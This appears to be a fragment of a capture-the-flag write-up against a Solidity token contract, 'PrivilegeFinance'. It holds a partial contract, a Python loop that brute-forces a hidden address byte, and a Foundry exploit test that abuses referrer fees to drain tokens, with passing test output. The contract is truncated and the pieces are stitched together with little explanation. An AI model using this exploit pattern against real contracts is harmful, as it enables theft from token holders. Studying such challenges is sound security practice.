// SPDX-License-Identifier: MIT pragma solidity ^0.8.4;
contract PrivilegeFinance { string public name = "Privilege Finance"; string public symbol = "PF"; uint256 public decimals = 18; uint256 public totalSupply = 200000000000; mapping(address => uint) public balances; mapping(address => address) public referrers; string msgsender = '0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E0'; uint public rewmax = 65000000000000000000000; uint public time = 1677729607; uint public Timeinterval = 600; uint public Timewithdraw = 6000; uint public Timeintervallimit = block.timestamp; uint public Timewithdrawlimit = block.timestamp; bytes32 r = 0xf296e6b417ce70a933383191bea6018cb24fa79d22f7fb3364ee4f54010a472c; bytes32 s = 0x62bdb7aed9e2f82b2822ab41eb03e86a9536fcccff5ef6c1fbf1f6415bd872f9; uint8 v = 28; address public admin = 0x2922F8CE662ffbD46e8AE872C1F285cd4a23765b; uint public burnFees = 2; uint public ReferrerFees = 8; uint public transferRate = 10; address public BurnAddr = 0x000000000000000000000000000000000000dEaD; bool public flag;
constructor() public { balances[address(this)] = totalSupply; }
function Airdrop() public { require(balances[msg.sender] == 0 && block.timestamp >= Timeintervallimit,"Collection time not reached"); balances[msg.sender] += 1000; balances[address(this)] -= 1000; Timeintervallimit += Timeinterval; }
for i in range(256): hexDigits = "{:02x}".format(i) checksummed = Web3.toChecksumAddress(msgsender + hexDigits) if (checksummed[:-2] == msgsender): print(checksummed)
contract goatFinanceTest is Test { PrivilegeFinance public goatFi; address owner = makeAddr("owner"); address hacker = makeAddr("hacker"); address hacker2 = makeAddr("hacker2");
function setUp() public { vm.prank(owner); goatFi = new PrivilegeFinance(); }
function testAttack() public { vm.startPrank(hacker); // get 1000 token to hacker from airdrop goatFi.Airdrop(); console.log("Hacker balance :", goatFi.balances(hacker)); console.log("Hacker2 balance :", goatFi.balances(hacker2)); console.log("GOATFinance balance :", goatFi.balances(address(goatFi))); // set hacker's referrer to hacker2 goatFi.deposit(address(0), 1, hacker2); goatFi.DynamicRew(0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E053, 1677729609, 1000000000, 50); // transfer to admin, so referrer get fee from goatFi contract goatFi.transfer(0x2922F8CE662ffbD46e8AE872C1F285cd4a23765b, 999); console.log("Hacker balance after :", goatFi.balances(hacker)); console.log("Hacker2 balance after :", goatFi.balances(hacker2)); console.log("GOATFinance balance after :", goatFi.balances(address(goatFi))); vm.stopPrank(); vm.startPrank(hacker2); goatFi.setflag(); assertTrue(goatFi.isSolved()); } }
然后它的输出:
# forge test --match-path test/GOATFinance.t.sol -vv [⠆] Compiling... No files changed, compilation skipped
Running 1 test for test/GOATFinance.t.sol:goatFinanceTest [PASS] testAttack() (gas: 191636) Logs: Hacker balance : 1000 Hacker2 balance : 0 GOATFinance balance : 199999999000 Hacker balance after : 480 Hacker2 balance after : 9980000000 GOATFinance balance after : 190019999001
Test result: ok. 1 passed; 0 failed; finished in 1.51ms